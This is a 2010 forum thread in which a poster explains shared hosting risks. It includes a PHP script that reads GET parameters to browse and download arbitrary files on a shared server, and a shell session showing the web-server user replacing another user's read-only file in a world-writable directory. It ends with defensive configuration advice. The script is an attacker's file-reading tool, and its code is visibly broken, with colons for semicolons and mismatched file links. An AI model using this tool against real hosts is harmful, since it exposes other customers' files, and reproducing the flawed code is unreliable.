Shared Hosting & Security Issues

**amndalb** · 30-07-2010, 06:58

great effort Rock!!!

**Rock** · 01-08-2010, 20:47

Originally posted by amndalb View Post

great effort Rock!!!

Thank you

**Rock** · 02-08-2010, 01:29

Hi all !

Ahh that 'tomorrow' has been quite late though.. almost a month, was busy with few other serious issues..

Ok, here's more on shared hosting security specially 'the Files & the Web Server'....

The following File Analysis (investigating the file system of a server) method stated in the below given script/example, works even when the only option you have is the use of PHP & when the PHP interpreter is running in the safe mode. In addition, if you can execute operating system commands & obtain their results (i.e., you have certain restricted HTTP server rights), you can investigate the server file system by using commands such as cd, ls, & cat in UNIX-like operating systems or cd, dir, & type in Windows ones..

PHP Code:


<?
$dir=$_GET['dir'];
$file=$_GET['file'];
$save=$_GET['save'];
if(!empty ($file) && !empty($save))
{
  $fname=addslashes($file);
  Header("Content-Type: application/octet-stream");
  $fullfile="{$dir}{$file}";
  $f=fopen($fullfile, "r");
  $ff="";
  while($b=fread($f, 1024))
  {
    $ff.=$b;
  };
  fclose($f);
  header("Content-Type: application/octet-stream; name=\"".$fname."\""):
  header("Content-Disposition: attachment; filename=\"".$fname."\""):
  header("Content-Length: ".strlen($ff)."");
  header("Content-Transfer-Encoding: binary");
  header("Connection: close");
  echo ($ff);
  exit;
}
if(empty($dir)) $dir=".";
if(!preg_match("/\/$/", $dir, $rd) ) $dir.="/";
echo "<html>
<head>
<title>".htmlspecialchars($dir)."</title>
</head>
<b>".htmlspecialchars($dir)."</b>
<table>
<tr>
<td>access rights</td>
<td>owner</td>
<td>group</td>
<td>size</td>
<td>name</td>
</td>
";
if ($ddir = opendir($dir))
{
  while ($dfile = readdir($ddir))
  {
    $dfullfile=$dir.$dfile;
    $str="<tr>";
    $str.="<td>".htmlspecialchars(fileperms($dfullfile))."</td>";
    $str.="<td>".htmlspecialchars(fileowner($dfullfile))."</td>";
    $str.="<td>".htmlspecialchars(filegroup($dfullfile))."</td>";
    $str.="<td>".htmlspecialchars(filesize($dfullfile))."</td>";
    if(is_dir($dfullfile))
    {
      $dfullfile.="/";
      $str.="<td><a href=\"1.php?dir=".
      htmlspecialchars($dfullfile)."\"><b>".
      htmlspecialchars ($dfile)."/</b></a></td>";
    }
    if(is_file($dfullfile)) {
      $dfullfile.="/";
      $str.="<td><a href=\"l.php?dir=".htmlspecialchars($dir).
      "&file=".htmlspecialchars($dfile),"\">".
      htmlspecialchars($dfile)."</a>
      (<a href=\"1.php?dir=".htmlspecialchars($dir).
      "&file=".htmlspecialchars($dfile).
      "&save=1\">save</a>)
      </td>";
    }
    $str.="</tr>";
    echo $str;
  }
  closedir($ddir);
}
echo"
</table>
".
if(!empty($file))
{
  $fullfile="{$dir}{$file}";
  $f=fopen($fullfile, "r");
  echo "<br><pre>---------".
  htmlspecialchars($fullfile).
  " ---------\r\n";
  while($b=fread($f, 1024))
  {
    echo htmlspecialchars($b);
  };
  fclose($f);
}
echo "
</body>
</html>
";
?>

In these examples, I don't concentrate on who accesses other people's sites: the owner of a site on the hosting server or a malicious hacker who obtained access to a site on this server. In these situations, various scenarios are possible.. A vulnerability in one site on the hosting server is a danger for all sites on this server. You could say it doesn't matter how many vulnerable sites are on a hosting server. Therefore, even if the target server is on a hosting server & is developed with all safety precautions & without vulnerabilities, this doesn't guarantee the security of the system. One vulnerable site that is not of interest to the attacker can be a threat to the entire hosting system treated as a set of sites.

What's more, if the attacker fails to find vulnerable sites located on the same hosting server as the target server, the cost of breakage for the attacker will be equal to the cost of renting the disk space with an option of executing scripts on this hosting server. In addition, some systems or sites require certain files to be available for writing to certain system scripts. In most cases, these files are simply made available for writing to all users. As a result, any user can change the contents of these files. Because the primary goal is the ability to change the contents of these files using scripts, these files should be accessible for reading to the user who started the HTTP server.. Thus, a person who controls a site (regardless of the ways, in which he or she obtained control) can change files available for writing on the target site.

If the attacker controls a site on the server, he or she can load this file on the server & edit the files of another site available for writing. Often, a file is not available for writing but the directory that contains it is available. In addition, this file can be available for reading to the attacker. Consider an example, If the attacker has the access rights of the apache user & the apache group.. The attacker wants to change the TEST.TXT file, which is available to the apache user for reading but not for writing. The directory is available for writing to all users..

PHP Code:


[sectest:~]$ id
uid=80(apache) gid=80(apache) groups=80(apache)
[sectest:~]$ ls -la
total 8
drwxrwxrwx   2 user     user   512 Jul 15 17:06 .
drwxr-xr-x  18 root     wheel 2560 Jul 15 17:03 ..
-rw-r--r--   1 user     user    10 Jul 15 17:03 test.txt
[sectest:~]$ cat test.txt
test file
[sectest:~]$ echo EDITED >> test.txt
-bash: test.txt: Permission denied
[sectest:~]$ cp test.txt x.txt
[sectest:~]$ ls -la
total 10
drwxrwxrwx   2 user     user    512 Jul 15 17:06 .
drwxr-xr-x  18 root     wheel  2560 Jul 15 17:03 ..
-rw-r--r--   1 user     user     10 Jul 15 17:03 test.txt
-rw-r--r--   1 apache   apache   10 Jul 15 17:06 x.txt
[sectest:~]$ cat x.txt
test file
[sectest:~]$ echo EDITED >> x.txt
[sectest:~]$ cat x.txt
test file
EDITED
[sectest:~]$ rm test.txt
override rw-r--r-- user/user for test.txt? y
[sectest:~]$ ls -la
total 8
drwxrwxrwx   2 user     user    512 Jul 15 17:07 .
drwxr-xr-x  18 root     wheel  2560 Jul 15 17:03 ..
-rw-r--r--   1 apache   apache   17 Jul 15 17:07 x.txt
[sectest:~]$ mv x.txt test.txt
[sectest:~]$ ls -la
total 8
drwxrwxrwx   2 user     user    512 Jul 15 17:07 .
drwxr-xr-x  18 root     wheel  2560 Jul 15 17:03 ..
-rw-r--r--   1 apache   apache   17 Jul 15 17:07 test.txt
[sectest:~]$ cat test.txt
test file
EDITED
[sectest:~]$

This is how the content of a file available only for reading could be changed.. Note that a side effect of this method is that the owner of the file has changed. Therefore, if the administrator investigates the incident, he or she will find the user who performed these actions. However, in this example, the actions were performed using a script available through HTTP on behalf of the apache user. To find the person who performed these actions, the administrator will have to analyze log files on the server. In some cases, he or she will fail to find the person.

To eliminate the vulnerability that allows an attacker to use scripts executed with the access rights of the HTTP server to read files belonging to other systems, hosting providers sometimes configure their servers so that the scripts are executed with the access rights of their owner or of the owner of the site. With such an approach, you can make files available for reading only to their owners... It will be impossible to use scripts belonging to other sites to read the contents of these files.

I'd like to emphasize that you should be careful when setting access rights to these files; otherwise, you won't achieve the desired goal. The higher the security level of invulnerable system, the lower the level of vulnerable ones.. The rights of file owners are privileges higher than the rights of the HTTP server. As a rule, the user who started the HTTP server gains minimal rights in the system...

Consider a system, in which scripts accessed using HTTP are executed with the rights of their owner or of the owner of the site. If the attacker finds a vulnerability allowing him or her to execute any commands, he or she will be able to execute them with the access rights of that user.. Because files belonging to a user are usually available for writing to that user, the attacker will be able to change the contents of these files & to read them..

To summarize, I strongly recommend that you stick to the following rule when configuring the HTTP server:

Scripts & programs that can be started using HTTP shouldn't be executed with the access rights of their owner or of the owner of the site... The best & the most common approach is to execute them with the access rights of a user with the minimum privileges in the system (e.g., nobody, apache, or www).

That's for today, err tonight.. till then.. laters.. :wink:

Shared Hosting & Security Issues

Shared Hosting & Security Issues

Comment

Comment

Comment